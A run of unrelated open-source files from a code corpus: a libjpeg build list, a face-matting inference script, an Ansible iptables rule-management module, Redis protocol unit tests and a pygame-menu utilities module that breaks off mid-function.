'jdphuff.c',
'jdpostct.c',
'jdsample.c',
'jdtrans.c',
'jerror.c',
'jfdctflt.c',
'jfdctfst.c',
'jfdctint.c',
'jidctflt.c',
'jidctfst.c',
'jidctint.c',
'jidctred.c',
'jmemansi.c',
#'jmemdos.c',
#'jmemmac.c',
'jmemmgr.c',
#'jmemname.c',
#'jmemnobs.c',
'jquant1.c',
'jquant2.c',
'jutils.c',
],
},
]
}
|
inference/inference_matting.py
|
spy14414/facexlib
| 164 |
70078
|
import argparse
import cv2
import numpy as np
import torch.nn.functional as F
from torchvision.transforms.functional import normalize
from facexlib.matting import init_matting_model
from facexlib.utils import img2tensor
def main(args):
modnet = init_matting_model()
# read image
img = cv2.imread(args.img_path) / 255.
# unify image channels to 3
if len(img.shape) == 2:
img = img[:, :, None]
if img.shape[2] == 1:
img = np.repeat(img, 3, axis=2)
elif img.shape[2] == 4:
img = img[:, :, 0:3]
img_t = img2tensor(img, bgr2rgb=True, float32=True)
normalize(img_t, (0.5, 0.5, 0.5), (0.5, 0.5, 0.5), inplace=True)
img_t = img_t.unsqueeze(0).cuda()
# resize image for input
_, _, im_h, im_w = img_t.shape
ref_size = 512
if max(im_h, im_w) < ref_size or min(im_h, im_w) > ref_size:
if im_w >= im_h:
im_rh = ref_size
im_rw = int(im_w / im_h * ref_size)
elif im_w < im_h:
im_rw = ref_size
im_rh = int(im_h / im_w * ref_size)
else:
im_rh = im_h
im_rw = im_w
im_rw = im_rw - im_rw % 32
im_rh = im_rh - im_rh % 32
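    # Example: a 1080x1920 (h x w) input takes the branch above, the shorter
    # side is scaled to ref_size=512 and the longer side to 910, then both are
    # rounded down to multiples of 32, giving a 512x896 network input.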
img_t = F.interpolate(img_t, size=(im_rh, im_rw), mode='area')
# inference
_, _, matte = modnet(img_t, True)
# resize and save matte
matte = F.interpolate(matte, size=(im_h, im_w), mode='area')
matte = matte[0][0].data.cpu().numpy()
cv2.imwrite(args.save_path, (matte * 255).astype('uint8'))
# get foreground
matte = matte[:, :, None]
foreground = img * matte + np.full(img.shape, 1) * (1 - matte)
cv2.imwrite(args.save_path.replace('.png', '_fg.png'), foreground * 255)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--img_path', type=str, default='assets/test.jpg')
parser.add_argument('--save_path', type=str, default='test_matting.png')
args = parser.parse_args()
main(args)
|
library/iptables.py
|
pgraziano/ursula
| 193 |
70085
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, <NAME> <<EMAIL>>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
BINS = dict(
ipv4='iptables',
ipv6='ip6tables',
)
DOCUMENTATION = '''
---
module: iptables
short_description: Modify the systems iptables
requirements: []
version_added: "2.0"
author: <NAME> (@LinusU) <<EMAIL>>
description:
- Iptables is used to set up, maintain, and inspect the tables of IP packet
filter rules in the Linux kernel. This module does not handle the saving
and/or loading of rules, but rather only manipulates the current rules
that are present in memory. This is the same as the behaviour of the
"iptables" and "ip6tables" command which this module uses internally.
notes:
- This module just deals with individual rules. If you need advanced
chaining of rules the recommended way is to template the iptables restore
file.
options:
table:
description:
- This option specifies the packet matching table which the command
should operate on. If the kernel is configured with automatic module
loading, an attempt will be made to load the appropriate module for
that table if it is not already there.
required: false
default: filter
choices: [ "filter", "nat", "mangle", "raw", "security" ]
state:
description:
- Whether the rule should be absent or present.
required: false
default: present
choices: [ "present", "absent" ]
action:
version_added: "2.2"
description:
- Whether the rule should be appended at the bottom or inserted at the
top. If the rule already exists the chain won't be modified.
required: false
default: append
choices: [ "append", "insert" ]
ip_version:
description:
- Which version of the IP protocol this rule should apply to.
required: false
default: ipv4
choices: [ "ipv4", "ipv6" ]
chain:
description:
- "Chain to operate on. This option can either be the name of a user
defined chain or any of the builtin chains: 'INPUT', 'FORWARD',
'OUTPUT', 'PREROUTING', 'POSTROUTING', 'SECMARK', 'CONNSECMARK'."
required: false
protocol:
description:
- The protocol of the rule or of the packet to check. The specified
protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the
special keyword "all", or it can be a numeric value, representing one
of these protocols or a different one. A protocol name from
/etc/protocols is also allowed. A "!" argument before the protocol
inverts the test. The number zero is equivalent to all. "all" will
match with all protocols and is taken as default when this option is
omitted.
required: false
default: null
source:
description:
- Source specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.
required: false
default: null
destination:
description:
- Destination specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.
required: false
default: null
match:
description:
- Specifies a match to use, that is, an extension module that tests for
a specific property. The set of matches make up the condition under
which a target is invoked. Matches are evaluated first to last if
specified as an array and work in short-circuit fashion, i.e. if one
extension yields false, evaluation will stop.
required: false
default: []
jump:
description:
- This specifies the target of the rule; i.e., what to do if the packet
matches it. The target can be a user-defined chain (other than the one
this rule is in), one of the special builtin targets which decide the
fate of the packet immediately, or an extension (see EXTENSIONS
        below). If this option is omitted in a rule (and the goto parameter
is not used), then matching the rule will have no effect on the
packet's fate, but the counters on the rule will be incremented.
required: false
default: null
goto:
description:
- This specifies that the processing should continue in a user specified
chain. Unlike the jump argument return will not continue processing in
this chain but instead in the chain that called us via jump.
required: false
default: null
in_interface:
description:
- Name of an interface via which a packet was received (only for packets
entering the INPUT, FORWARD and PREROUTING chains). When the "!"
argument is used before the interface name, the sense is inverted. If
the interface name ends in a "+", then any interface which begins with
this name will match. If this option is omitted, any interface name
will match.
required: false
default: null
out_interface:
description:
- Name of an interface via which a packet is going to be sent (for
packets entering the FORWARD, OUTPUT and POSTROUTING chains). When the
"!" argument is used before the interface name, the sense is inverted.
If the interface name ends in a "+", then any interface which begins
with this name will match. If this option is omitted, any interface
name will match.
required: false
default: null
fragment:
description:
- This means that the rule only refers to second and further fragments
of fragmented packets. Since there is no way to tell the source or
destination ports of such a packet (or ICMP type), such a packet will
not match any rules which specify them. When the "!" argument precedes
fragment argument, the rule will only match head fragments, or
unfragmented packets.
required: false
default: null
set_counters:
description:
- This enables the administrator to initialize the packet and byte
counters of a rule (during INSERT, APPEND, REPLACE operations).
required: false
default: null
source_port:
description:
- "Source port or port range specification. This can either be a service
name or a port number. An inclusive range can also be specified, using
the format first:last. If the first port is omitted, '0' is assumed;
if the last is omitted, '65535' is assumed. If the first port is
greater than the second one they will be swapped."
required: false
default: null
destination_port:
description:
- "Destination port or port range specification. This can either be
a service name or a port number. An inclusive range can also be
specified, using the format first:last. If the first port is omitted,
'0' is assumed; if the last is omitted, '65535' is assumed. If the
first port is greater than the second one they will be swapped."
required: false
default: null
to_ports:
description:
- "This specifies a destination port or range of ports to use: without
this, the destination port is never altered. This is only valid if the
rule also specifies one of the following protocols: tcp, udp, dccp or
sctp."
required: false
default: null
to_destination:
version_added: "2.1"
description:
- "This specifies a destination address to use with DNAT: without
this, the destination address is never altered."
required: false
default: null
to_source:
version_added: "2.2"
description:
- "This specifies a source address to use with SNAT: without
this, the source address is never altered."
required: false
default: null
set_dscp_mark:
version_added: "2.1"
description:
- "This allows specifying a DSCP mark to be added to packets.
It takes either an integer or hex value. Mutually exclusive with
C(set_dscp_mark_class)."
required: false
default: null
set_dscp_mark_class:
version_added: "2.1"
description:
- "This allows specifying a predefined DiffServ class which will be
translated to the corresponding DSCP mark. Mutually exclusive with
C(set_dscp_mark)."
required: false
default: null
comment:
description:
- "This specifies a comment that will be added to the rule"
required: false
default: null
ctstate:
description:
- "ctstate is a list of the connection states to match in the conntrack
module.
Possible states are: 'INVALID', 'NEW', 'ESTABLISHED', 'RELATED',
'UNTRACKED', 'SNAT', 'DNAT'"
required: false
default: []
limit:
description:
- "Specifies the maximum average number of matches to allow per second.
The number can specify units explicitly, using `/second', `/minute',
`/hour' or `/day', or parts of them (so `5/second' is the same as
`5/s')."
required: false
default: null
limit_burst:
version_added: "2.1"
description:
- "Specifies the maximum burst before the above limit kicks in."
required: false
default: null
uid_owner:
version_added: "2.1"
description:
- "Specifies the UID or username to use in match by owner rule."
required: false
reject_with:
version_added: "2.1"
description:
- "Specifies the error packet type to return while rejecting."
required: false
icmp_type:
version_added: "2.2"
description:
- "This allows specification of the ICMP type, which can be a numeric
ICMP type, type/code pair, or one of the ICMP type names shown by the
command 'iptables -p icmp -h'"
required: false
flush:
version_added: "2.2"
description:
- "Flushes the specified table and chain of all rules. If no chain is
specified then the entire table is purged. Ignores all other
parameters."
required: false
policy:
version_added: "2.2"
description:
- "Set the policy for the chain to the given target. Valid targets are
ACCEPT, DROP, QUEUE, RETURN. Only built in chains can have policies.
This parameter requires the chain parameter. Ignores all other
parameters."
'''
EXAMPLES = '''
# Block specific IP
- iptables: chain=INPUT source=8.8.8.8 jump=DROP
become: yes
# Forward port 80 to 8600
- iptables: table=nat chain=PREROUTING in_interface=eth0 protocol=tcp match=tcp destination_port=80 jump=REDIRECT to_ports=8600 comment="Redirect web traffic to port 8600"
become: yes
# Allow related and established connections
- iptables: chain=INPUT ctstate=ESTABLISHED,RELATED jump=ACCEPT
become: yes
# Tag all outbound tcp packets with DSCP mark 8
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark=8 protocol=tcp
# Tag all outbound tcp packets with DSCP DiffServ class CS1
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark_class=CS1 protocol=tcp
'''
def append_param(rule, param, flag, is_list):
if is_list:
for item in param:
append_param(rule, item, flag, False)
else:
if param is not None:
rule.extend([flag, param])
def append_csv(rule, param, flag):
if param:
rule.extend([flag, ','.join(param)])
def append_match(rule, param, match):
if param:
rule.extend(['-m', match])
def append_jump(rule, param, jump):
if param:
rule.extend(['-j', jump])
def construct_rule(params):
rule = []
append_param(rule, params['protocol'], '-p', False)
append_param(rule, params['source'], '-s', False)
append_param(rule, params['destination'], '-d', False)
append_param(rule, params['match'], '-m', True)
append_param(rule, params['jump'], '-j', False)
append_param(rule, params['to_destination'], '--to-destination', False)
append_param(rule, params['to_source'], '--to-source', False)
append_param(rule, params['goto'], '-g', False)
append_param(rule, params['in_interface'], '-i', False)
append_param(rule, params['out_interface'], '-o', False)
append_param(rule, params['fragment'], '-f', False)
append_param(rule, params['set_counters'], '-c', False)
append_param(rule, params['source_port'], '--source-port', False)
append_param(rule, params['destination_port'], '--destination-port', False)
append_param(rule, params['to_ports'], '--to-ports', False)
append_param(rule, params['set_dscp_mark'], '--set-dscp', False)
append_param(
rule,
params['set_dscp_mark_class'],
'--set-dscp-class',
False)
append_match(rule, params['comment'], 'comment')
append_param(rule, params['comment'], '--comment', False)
append_match(rule, params['ctstate'], 'state')
append_csv(rule, params['ctstate'], '--state')
append_match(rule, params['limit'] or params['limit_burst'], 'limit')
append_param(rule, params['limit'], '--limit', False)
append_param(rule, params['limit_burst'], '--limit-burst', False)
append_match(rule, params['uid_owner'], 'owner')
append_param(rule, params['uid_owner'], '--uid-owner', False)
append_jump(rule, params['reject_with'], 'REJECT')
append_param(rule, params['reject_with'], '--reject-with', False)
append_param(rule, params['icmp_type'], '--icmp-type', False)
return rule
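# For illustration (hypothetical params, all other options left at their module
# defaults): protocol='tcp', jump='ACCEPT', ctstate=['NEW'] makes construct_rule()
# return ['-p', 'tcp', '-j', 'ACCEPT', '-m', 'state', '--state', 'NEW'].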
def push_arguments(iptables_path, action, params, make_rule=True):
cmd = [iptables_path]
cmd.extend(['-t', params['table']])
cmd.extend([action, params['chain']])
if make_rule:
cmd.extend(construct_rule(params))
return cmd
def check_present(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-C', params)
rc, _, __ = module.run_command(cmd, check_rc=False)
return (rc == 0)
def append_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-A', params)
module.run_command(cmd, check_rc=True)
def insert_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-I', params)
module.run_command(cmd, check_rc=True)
def remove_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-D', params)
module.run_command(cmd, check_rc=True)
def flush_table(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-F', params, make_rule=False)
module.run_command(cmd, check_rc=True)
def set_chain_policy(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-P', params, make_rule=False)
cmd.append(params['policy'])
module.run_command(cmd, check_rc=True)
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
table=dict(
required=False,
default='filter',
choices=['filter', 'nat', 'mangle', 'raw', 'security']),
state=dict(
required=False,
default='present',
choices=['present', 'absent']),
action=dict(
required=False,
default='append',
type='str',
choices=['append', 'insert']),
ip_version=dict(
required=False,
default='ipv4',
choices=['ipv4', 'ipv6']),
chain=dict(required=False, default=None, type='str'),
protocol=dict(required=False, default=None, type='str'),
source=dict(required=False, default=None, type='str'),
to_source=dict(required=False, default=None, type='str'),
destination=dict(required=False, default=None, type='str'),
to_destination=dict(required=False, default=None, type='str'),
match=dict(required=False, default=[], type='list'),
jump=dict(required=False, default=None, type='str'),
goto=dict(required=False, default=None, type='str'),
in_interface=dict(required=False, default=None, type='str'),
out_interface=dict(required=False, default=None, type='str'),
fragment=dict(required=False, default=None, type='str'),
set_counters=dict(required=False, default=None, type='str'),
source_port=dict(required=False, default=None, type='str'),
destination_port=dict(required=False, default=None, type='str'),
to_ports=dict(required=False, default=None, type='str'),
set_dscp_mark=dict(required=False, default=None, type='str'),
set_dscp_mark_class=dict(required=False, default=None, type='str'),
comment=dict(required=False, default=None, type='str'),
ctstate=dict(required=False, default=[], type='list'),
limit=dict(required=False, default=None, type='str'),
limit_burst=dict(required=False, default=None, type='str'),
uid_owner=dict(required=False, default=None, type='str'),
reject_with=dict(required=False, default=None, type='str'),
icmp_type=dict(required=False, default=None, type='str'),
flush=dict(required=False, default=False, type='bool'),
policy=dict(
required=False,
default=None,
type='str',
choices=['ACCEPT', 'DROP', 'QUEUE', 'RETURN']),
),
mutually_exclusive=(
['set_dscp_mark', 'set_dscp_mark_class'],
['flush', 'policy'],
),
)
args = dict(
changed=False,
failed=False,
ip_version=module.params['ip_version'],
table=module.params['table'],
chain=module.params['chain'],
flush=module.params['flush'],
rule=' '.join(construct_rule(module.params)),
state=module.params['state'],
)
ip_version = module.params['ip_version']
iptables_path = module.get_bin_path(BINS[ip_version], True)
# Check if chain option is required
if args['flush'] is False and args['chain'] is None:
module.fail_json(
msg="Either chain or flush parameter must be specified.")
# Flush the table
if args['flush'] is True:
flush_table(iptables_path, module, module.params)
module.exit_json(**args)
# Set the policy
if module.params['policy']:
set_chain_policy(iptables_path, module, module.params)
module.exit_json(**args)
insert = (module.params['action'] == 'insert')
rule_is_present = check_present(iptables_path, module, module.params)
should_be_present = (args['state'] == 'present')
# Check if target is up to date
args['changed'] = (rule_is_present != should_be_present)
# Check only; don't modify
if module.check_mode:
module.exit_json(changed=args['changed'])
# Target is already up to date
if args['changed'] is False:
module.exit_json(**args)
if should_be_present:
if insert:
insert_rule(iptables_path, module, module.params)
else:
append_rule(iptables_path, module, module.params)
else:
remove_rule(iptables_path, module, module.params)
module.exit_json(**args)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
tests/test_protocol.py
|
ShadowJonathan/txredisapi
| 104 |
70101
|
# coding: utf-8
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import txredisapi as redis
from twisted.trial import unittest
from twisted.internet.protocol import ClientFactory
from twisted.test.proto_helpers import StringTransportWithDisconnection
from twisted.internet import task
class MockFactory(ClientFactory):
pass
class LineReceiverSubclass(redis.LineReceiver):
def lineReceived(self, line):
self._rcvd_line = line
def rawDataReceived(self, data):
self._rcvd_data = data
class TestLineReciever(unittest.TestCase):
S = six.b('TEST')
def setUp(self):
self.proto = LineReceiverSubclass()
self.transport = StringTransportWithDisconnection()
self.proto.makeConnection(self.transport)
self.transport.protocol = self.proto
self.proto.factory = MockFactory()
def test_excess_line_length(self):
self.assertTrue(self.transport.connected)
self.proto.dataReceived(six.b('\x00') * (self.proto.MAX_LENGTH + 1))
self.assertFalse(self.transport.connected)
def test_excess_delimited_line(self):
self.assertTrue(self.transport.connected)
self.proto.dataReceived(self.S + self.proto.delimiter)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
s = (six.b('\x00') * (self.proto.MAX_LENGTH + 1)) + self.proto.delimiter
self.proto._rcvd_line = None
self.proto.dataReceived(s)
self.assertFalse(self.transport.connected)
self.assertIs(self.proto._rcvd_line, None)
def test_clear_line_buffer(self):
self.proto.dataReceived(self.S)
self.assertEqual(self.proto.clearLineBuffer(), self.S)
def test_send_line(self):
self.proto.dataReceived(self.S + self.proto.delimiter)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
def test_raw_data(self):
clock = task.Clock()
self.proto.callLater = clock.callLater
self.proto.setRawMode()
s = self.S + self.proto.delimiter
self.proto.dataReceived(s)
self.assertEqual(self.proto._rcvd_data, s)
self.proto._rcvd_line = None
self.proto.setLineMode(s)
clock.advance(1)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
self.proto.dataReceived(s)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
def test_sendline(self):
self.proto.sendLine(self.S)
value = self.transport.value()
self.assertEqual(value, self.S + self.proto.delimiter)
class TestBaseRedisProtocol(unittest.TestCase):
def setUp(self):
self._protocol = redis.BaseRedisProtocol()
def test_build_ping(self):
s = self._protocol._build_command("PING")
self.assertEqual(s, six.b('*1\r\n$4\r\nPING\r\n'))
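# Illustrative sketch (not part of the original suite): assuming _build_command follows
# the same RESP encoding as the PING case above, a multi-argument command would
# serialize each argument with its byte length, e.g.:
#   self._protocol._build_command("SET", "key", "value")
#   -> b'*3\r\n$3\r\nSET\r\n$3\r\nkey\r\n$5\r\nvalue\r\n'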
|
pygame_menu/utils.py
|
ppizarror/pygame-menu
| 419 |
70102
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
UTILS
Utility functions.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 <NAME>. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
__all__ = [
# Methods
'assert_alignment',
'assert_color',
'assert_cursor',
'assert_list_vector',
'assert_orientation',
'assert_position',
'assert_position_vector',
'assert_vector',
'check_key_pressed_valid',
'fill_gradient',
'format_color',
'get_cursor',
'get_finger_pos',
'is_callable',
'load_pygame_image_file',
'make_surface',
'mouse_motion_current_mouse_position',
'parse_padding',
'print_menu_widget_structure',
'set_pygame_cursor',
'uuid4',
'warn',
'widget_terminal_title',
# Constants
'PYGAME_V2',
# Classes
'TerminalColors'
]
import functools
# import inspect
import sys
import traceback
import types
import uuid
import warnings
import pygame
import pygame_menu
from pygame_menu.locals import ALIGN_CENTER, ALIGN_LEFT, ALIGN_RIGHT, POSITION_CENTER, \
POSITION_NORTH, POSITION_SOUTH, POSITION_SOUTHEAST, POSITION_NORTHWEST, \
POSITION_WEST, POSITION_EAST, POSITION_NORTHEAST, POSITION_SOUTHWEST, \
ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL, FINGERDOWN, FINGERUP, FINGERMOTION
from pygame_menu._types import ColorType, ColorInputType, Union, List, Vector2NumberType, \
NumberType, Any, Optional, Tuple, NumberInstance, VectorInstance, PaddingInstance, \
PaddingType, Tuple4IntType, ColorInputInstance, VectorType, EventType, \
CursorInputInstance, CursorInputType, Tuple2IntType, Dict
PYGAME_V2 = pygame.version.vernum[0] >= 2
WARNINGS_LAST_MESSAGES: Dict[int, bool] = {}
def assert_alignment(align: str) -> None:
"""
Assert that a certain alignment is valid.
:param align: Align value
:return: None
"""
assert isinstance(align, str), f'alignment "{align}" must be a string'
assert align in (ALIGN_LEFT, ALIGN_CENTER, ALIGN_RIGHT), \
f'incorrect alignment value "{align}"'
def assert_color(
color: Union[ColorInputType, List[int]],
warn_if_invalid: bool = True
) -> ColorType:
"""
Assert that a certain color is valid.
:param color: Object color
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Formatted color if valid, otherwise an ``AssertionError`` is raised
"""
color = format_color(color, warn_if_invalid=warn_if_invalid)
assert isinstance(color, VectorInstance), \
f'color must be a tuple or list, not type "{type(color)}"'
assert 4 >= len(color) >= 3, \
'color must be a tuple or list of 3 or 4 numbers'
for i in range(3):
assert isinstance(color[i], int), \
f'"{color[i]}" in element color {color} must be an integer, not type "{type(color)}"'
assert 0 <= color[i] <= 255, \
f'"{color[i]}" in element color {color} must be an integer between 0 and 255'
if len(color) == 4:
assert isinstance(color[3], int), \
f'alpha channel must be an integer between 0 and 255, not type "{type(color)}"'
assert 0 <= color[3] <= 255, \
f'opacity of color {color} must be an integer between 0 and 255; ' \
f'where 0 is fully-transparent and 255 is fully-opaque'
return color
def assert_cursor(cursor: CursorInputType) -> None:
"""
Assert a given cursor is valid.
:param cursor: Cursor object
:return: None
"""
assert isinstance(cursor, CursorInputInstance), \
'cursor instance invalid, it can be None, an integer, ' \
'or pygame.cursors.Cursor'
def assert_list_vector(list_vector: Union[List[Vector2NumberType], Tuple[Vector2NumberType, ...]],
length: int) -> None:
"""
Assert that a list fixed length vector is numeric.
:param list_vector: Numeric list vector
:param length: Length of the required vector. If ``0`` don't check the length
:return: None
"""
assert isinstance(list_vector, VectorInstance), \
f'list_vector "{list_vector}" must be a tuple or list'
for v in list_vector:
assert_vector(v, length)
def assert_orientation(orientation: str) -> None:
"""
Assert that a certain widget orientation is valid.
:param orientation: Object orientation
:return: None
"""
assert isinstance(orientation, str), \
f'orientation "{orientation}" must be a string'
assert orientation in (ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL), \
f'invalid orientation value "{orientation}"'
def assert_position(position: str) -> None:
"""
Assert that a certain position is valid.
:param position: Object position
:return: None
"""
assert isinstance(position, str), \
f'position "{position}" must be a string'
assert position in (POSITION_WEST, POSITION_SOUTHWEST, POSITION_SOUTH,
POSITION_SOUTHEAST, POSITION_EAST, POSITION_NORTH,
POSITION_NORTHWEST, POSITION_NORTHEAST, POSITION_CENTER), \
f'invalid position value "{position}"'
def assert_position_vector(position: Union[str, List[str], Tuple[str, ...]]) -> None:
"""
Assert that a position vector is valid.
:param position: Object position
:return: None
"""
if isinstance(position, str):
assert_position(position)
else:
assert isinstance(position, VectorInstance)
unique = []
for pos in position:
assert_position(pos)
if pos not in unique:
unique.append(pos)
assert len(unique) == len(position), 'there cannot be repeated positions'
def assert_vector(
num_vector: VectorType,
length: int,
instance: type = NumberInstance
) -> None:
"""
Assert that a fixed length vector is numeric.
:param num_vector: Numeric vector
:param length: Length of the required vector. If ``0`` don't check the length
:param instance: Instance of each item of the vector
:return: None
"""
assert isinstance(num_vector, VectorInstance), \
f'vector "{num_vector}" must be a list or tuple of {length} items if type {instance}'
if length != 0:
assert len(num_vector) == length, \
f'vector "{num_vector}" must contain {length} numbers only, ' \
f'but {num_vector} were given'
for i in range(len(num_vector)):
num = num_vector[i]
if instance == int and isinstance(num, float) and int(num) == num:
num = int(num)
assert isinstance(num, instance), \
f'item {num} of vector must be {instance}, not type "{type(num)}"'
def check_key_pressed_valid(event: EventType) -> bool:
"""
Checks if the pressed key is valid.
:param event: Key press event
:return: ``True`` if a key is pressed
"""
# If the system detects that any key event has been pressed but
# there's not any key pressed then this method raises a KEYUP
# flag
bad_event = not (True in pygame.key.get_pressed())
if bad_event:
if 'test' in event.dict and event.dict['test']:
return True
ev = pygame.event.Event(pygame.KEYUP, {'key': event.key})
pygame.event.post(ev)
return not bad_event
def fill_gradient(
surface: 'pygame.Surface',
color: ColorInputType,
gradient: ColorInputType,
rect: Optional['pygame.Rect'] = None,
vertical: bool = True,
forward: bool = True
) -> None:
"""
Fill a surface with a gradient pattern.
:param surface: Surface to fill
:param color: Starting color
:param gradient: Final color
:param rect: Area to fill; default is surface's rect
:param vertical: True=vertical; False=horizontal
:param forward: True=forward; False=reverse
:return: None
"""
if rect is None:
rect = surface.get_rect()
x1, x2 = rect.left, rect.right
y1, y2 = rect.top, rect.bottom
color = assert_color(color)
gradient = assert_color(gradient)
if vertical:
h = y2 - y1
else:
h = x2 - x1
if forward:
a, b = color, gradient
else:
b, a = color, gradient
rate = (
float(b[0] - a[0]) / h,
float(b[1] - a[1]) / h,
float(b[2] - a[2]) / h
)
fn_line = pygame.draw.line
if vertical:
for line in range(y1, y2):
color = (
min(max(a[0] + (rate[0] * (line - y1)), 0), 255),
min(max(a[1] + (rate[1] * (line - y1)), 0), 255),
min(max(a[2] + (rate[2] * (line - y1)), 0), 255)
)
fn_line(surface, color, (x1, line), (x2, line))
else:
for col in range(x1, x2):
color = (
min(max(a[0] + (rate[0] * (col - x1)), 0), 255),
min(max(a[1] + (rate[1] * (col - x1)), 0), 255),
min(max(a[2] + (rate[2] * (col - x1)), 0), 255)
)
fn_line(surface, color, (col, y1), (col, y2))
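# Usage sketch (illustrative, not part of the original module): fill a small surface
# with a vertical red-to-black gradient; make_surface is defined later in this file.
#   surface = make_surface(200, 100)
#   fill_gradient(surface, color=(255, 0, 0), gradient=(0, 0, 0), vertical=True)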
def format_color(
color: Union[ColorInputType, Any],
warn_if_invalid: bool = True
) -> Union[ColorType, Any]:
"""
Format color from string, int, or tuple to tuple type.
Available formats:
- Color name str: name of the color to use, e.g. ``"red"`` (all the supported name strings can be found in the colordict module, see https://github.com/pygame/pygame/blob/main/src_py/colordict.py)
- HTML color format str: ``"#rrggbbaa"`` or ``"#rrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- Hex number str: ``"0xrrggbbaa"`` or ``"0xrrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- int: int value of the color to use, using hex numbers can make this parameter more readable, e.g. ``0xrrggbbaa``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, note that the aa (alpha) value is not optional for the int format and must be provided
- tuple/list of int color values: ``(R, G, B, A)`` or ``(R, G, B)``, where R, G, B, and A are int values in the range of ``0`` to ``255`` inclusive, the A (alpha) value defaults to ``255`` (opaque) if not provided
:param color: Color to format. If format is valid returns the same input value
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Color in (r, g, b, a) format
"""
if not isinstance(color, ColorInputInstance):
return color
if not isinstance(color, pygame.Color):
try:
if isinstance(color, VectorInstance) and 3 <= len(color) <= 4:
if PYGAME_V2:
for j in color:
if not isinstance(j, int):
raise ValueError('color cannot contain floating point values')
c = pygame.Color(*color)
else:
c = pygame.Color(color)
except ValueError:
if warn_if_invalid:
warn(f'invalid color value "{color}"')
else:
raise
return color
else:
c = color
return c.r, c.g, c.b, c.a
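# Illustrative sketch of the accepted input styles (expected outputs assume pygame's
# standard colordict; not part of the original module):
#   format_color('red')        -> (255, 0, 0, 255)
#   format_color('#ff000080')  -> (255, 0, 0, 128)
#   format_color((10, 20, 30)) -> (10, 20, 30, 255)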
def get_cursor() -> CursorInputType:
"""
Return the pygame cursor object.
:return: Cursor object
"""
try:
return pygame.mouse.get_cursor()
except TypeError as e:
warn(str(e))
return None
def get_finger_pos(menu: 'pygame_menu.Menu', event: EventType) -> Tuple2IntType:
"""
Return the position from finger (or mouse) event on x-axis and y-axis (x, y).
:param menu: Menu object for relative positioning in finger events
:param event: Pygame event object
:return: Position on x-axis and y-axis (x, y) in px
"""
if event.type in (FINGERDOWN, FINGERMOTION, FINGERUP):
assert menu is not None, \
'menu reference cannot be none while using finger position'
display_size = menu.get_window_size()
